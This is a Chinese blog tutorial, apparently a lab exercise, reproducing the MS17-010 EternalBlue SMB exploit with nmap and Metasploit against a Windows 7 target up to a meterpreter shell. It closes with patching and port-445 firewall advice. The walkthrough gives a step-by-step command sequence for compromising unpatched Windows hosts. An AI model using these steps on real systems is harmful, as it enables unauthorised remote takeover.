MS17-010(永恒之蓝)漏洞复现及防范措施

目录

一、漏洞简介

1.介绍

2.漏洞危害

 二、环境准备

 三、攻击复现

1.namp网络嗅探

​编辑

 2.启动MSF

 3.启用扫描模块

 4.分析模块

5.对目标进行扫描

6.发现存在漏洞

7.使用攻击模块 

8.攻击成功

9.进入、退出及解决乱码

四、防范措施


一、漏洞简介

1.介绍

利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。

        ①SMB简介:是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上。

        ②SMB端口:使用TCP139端口和TCP445端口

2.漏洞危害

只要能开机上网,不法分子就可以植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

 二、环境准备

靶机:Windows7(10.0.0.102)或Windows10

攻击者:kali Linux(10.0.0.200)

条件:两台主机可以互相ping通,Windows 7 防火墙关闭,445端口开启

 三、攻击复现

1.namp网络嗅探

使用namp对目标ip端口进行扫描

扫描445端口开启,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞

#nmap 10.0.0.102

 2.启动MSF

使用 msfconsole 命令打开 Metasploit 渗透测试平台

#msfconsole

 

 3.启用扫描模块

搜索MS17-010漏洞

#search ms17-010

 4.分析模块

auxiliary/scanner/smb/smb_ms17_010                        ------扫描模块

exploit/windows/smb/ms17_010_eternalblue               ------攻击模块

5.对目标进行扫描

#use 3        ----使用扫描模块

#show options  ---查看配置信息

#set rhosts 10.0.0.102     ---设置靶机ip

#run      -----启动

6.发现存在漏洞

再次确认目标存在漏洞

        图中带[+]符号表示该主机10.0.0.102存在此漏洞(正是我们的靶机win7)

7.使用攻击模块 

#back                    ----退出模块

#use 0                   ----使用攻击模块

#show options       -----查看配置信息

#set rhosts            -----设置靶机ip

#exploit                 ------运行(与run功能一致)

8.攻击成功

出现meterpreter表示攻击成功

9.进入、退出及解决乱码

#shell        ----进入终端

#exit        -----退出终端

#chcp 65001        ----解决乱码

#ipconfig        ----查看ip

四、防范措施

 ①及时更新系统补丁;

②在防火墙中设置445的进出站规则。

  • 18
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值